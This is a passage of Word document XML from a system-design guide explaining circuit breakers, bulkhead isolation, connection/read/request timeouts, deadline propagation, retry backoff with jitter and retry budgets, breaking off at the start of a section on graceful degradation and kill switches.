        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Closed State (normal operation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784AE1C3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>All requests pass through to the downstream service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC3EDDF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Each failure increments a failure counter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568983EA" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Each success decrements the counter (or resets it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7496843E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If failure count exceeds threshold within a time window → transition to </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5C2F5D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Open State (failing fast):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6491F1E7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>All requests </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>immediately fail</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> without calling the downstream service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFA1311" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Returns a pre-configured fallback (error, cached response, default value).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBA5F73" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A timer runs. After the timeout (e.g., 30 seconds) → transition to </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Half-Open</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EC8450" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Half-Open State (probing recovery):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299CBA1F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>limited number</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> of test requests are allowed through to the downstream service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9CEE8E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If they succeed → transition back to </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Closed</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (service recovered).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B78BFBD" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If they fail → transition back to </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (service still failing, reset timer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52607CC4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The internal sliding window:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Modern circuit breakers (Resilience4j, Hystrix) use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sliding window</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> of the last N requests (count-based) or last N seconds (time-based) to compute failure rate. This prevents a burst of old failures from triggering the breaker on a healthy service, and allows recovery to be detected by looking at recent requests only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9F5381" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why it preserves availability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> When a downstream service is struggling (slow or failing), calls to it consume threads, connections, and time. Without a circuit breaker, all requests to your service pile up waiting for the slow downstream — your service becomes slow too, cascading the failure. The circuit breaker </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fails fast</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>, freeing your resources to serve requests that don't need the downstream service, limiting blast radius.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D534FB6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bulkhead Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7025B668" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Named after ship bulkheads — watertight compartments that prevent a hull breach from sinking the whole ship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D3A3F2" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem it solves:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Without bulkheads, all requests share the same thread pool, connection pool, and resources. A slow downstream service causes threads to block waiting for responses. Eventually </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>all threads are blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — the service cannot handle any requests, including those that don't need the slow downstream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4577F8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implementation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Allocate </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>separate resource pools</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (thread pools, connection pools, semaphores) per downstream dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07184515" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491EDDE4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Payment Service thread pool:   20 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40335490" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Inventory Service thread pool: 20 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3FDEE6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>User Service thread pool:      10 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0956D515" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Shared thread pool:            50 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63392A98" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If the Payment Service becomes slow and all 20 payment threads are blocked, the Inventory Service and User Service continue functioning normally with their own pools. The blast radius is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>contained to the payment bulkhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2323EA41" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Semaphore-based bulkheads:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Instead of separate thread pools, use counting semaphores to limit concurrent calls to each dependency. Simpler but doesn't prevent thread blocking — it just limits how many threads can block on a given dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DE7BB5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timeout Strategy — The Three Timeout Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793C9C27" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Every network call must have a timeout. But there are three different timeouts, each serving a different purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253F765C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection Timeout:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> How long to wait for the TCP connection to be established. Catches the case where the destination is unreachable (firewall, dead server). Typically: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1–5 seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAC7A5F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read Timeout (Socket Timeout):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> How long to wait for data after the connection is established. Catches the case where the server accepted the connection but then hung (deadlock, infinite loop, disk I/O block). Typically: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5–30 seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> depending on expected operation duration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DF44EA" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request Timeout (End-to-End):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Total time allowed for the entire request, from initiation to complete response received. This is the one that matters most for SLO compliance. It's the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ceiling on request latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> from the client's perspective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5563738A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timeout budget / deadline propagation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> In a microservices system, if Service A calls Service B which calls Service C, each has its own timeout. But if Service A has a 1-second total timeout and it already spent 800ms before calling Service B, Service B shouldn't use a 1-second timeout for its call to Service C — it should inherit a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remaining budget of ~100ms</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (with some buffer). This is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>deadline propagation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>, implemented via request headers (gRPC propagates deadlines natively). Without it, downstream services waste time on work whose results will be discarded because the upstream already timed out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63544741" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retry Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333E6573" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>Retries are essential but dangerous. Done wrong, retries cause the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>retry storms</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> that turn partial failures into complete outages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC6C8A3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When to retry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140C0995" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Idempotent operations only:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> GET, PUT, DELETE (HTTP semantics). POST is not idempotent — retrying a payment POST may charge the customer twice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD8500E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Transient failures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Network timeouts, connection resets, 503 Service Unavailable. Not on permanent failures (404, 400 Bad Request, 401 Unauthorized) — retrying these wastes resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0183E209" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exponential backoff with jitter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B83288B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B73BF5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>wait = min(cap, base × 2^attempt) + random(0, jitter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D83F4AD" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Example with base=100ms, cap=10s, jitter=100ms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4E8669" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Attempt 1: wait = min(10000, 100×2¹) + rand = 200ms + jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218743C3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Attempt 2: wait = min(10000, 100×2²) + rand = 400ms + jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3F4C9B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Attempt 3: wait = min(10000, 100×2³) + rand = 800ms + jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606ABC0F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Attempt 7: wait = 10000ms (capped) + jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BD7EE9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cap</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> prevents waiting forever. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>jitter</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> prevents synchronized retries. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exponential growth</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> gives the downstream service breathing room.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BAAD52" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retry budget:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Limit the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>total percentage of requests that can be retries</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>. If your service receives 1000 RPS and allows unlimited retries, a wave of failures could generate 3000 RPS of retries, amplifying the load 3x. A retry budget of 10% means at most 100 RPS can be retries — the other 900 RPS are original requests. This is enforced by a token bucket on the retry path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15982C96" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="0980ECB3">
          <v:rect id="_x0000_i2152" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F32B78" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Graceful Degradation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D75E2E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A highly available system doesn't binary flip between "fully working" and "completely down." It degrades </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gracefully</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — providing reduced functionality rather than no functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7144DE67" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Feature Flags and Kill Switches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A15117F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>Every non-critical feature should have a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kill switch</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — a configuration flag that can disable it instantly without a deployment. When a feature is causing load or errors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154D2D8D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Toggle the kill switch (change a config value in Redis, LaunchDarkly, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD929CD" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
